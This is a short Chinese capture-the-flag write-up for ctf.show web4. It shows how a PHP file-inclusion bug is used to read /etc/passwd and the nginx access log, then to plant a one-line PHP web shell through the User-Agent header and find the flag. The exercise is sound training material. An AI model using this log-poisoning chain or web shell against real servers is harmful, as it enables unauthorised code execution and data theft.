Include日志利用，ctf.show_web4 题目<?php include($_GET['url']);?>解题流程检查COOKIE，发现没有任何东西尝试file协议读取/etc/passwd ，发现可以利用通过http间谍插件发现中间件为nginx尝试读取nginx日志文件/var/log/nginx/access.log发现可以读取到内容发现日志文件记录的有User-Agent的值，可以当做注入点动手！http间谍读取日志通过User-Agent注入修改User-Agent的值为一句话 <?php eval($_POST[0]);?>通过AntSword连接寻找flag通过图形界面并没有找到flag，于是通过命令行开始查找一下flag文件的位置find / -name "*flag*"读取flagcat /var/www/flag.txt总结nginx默认日志文件路径 /var/log/nginx/access.logapache默认日志文件路径 /var/log/httpd/access_logapache默认日志文件路径 /var/log/apache2/access.log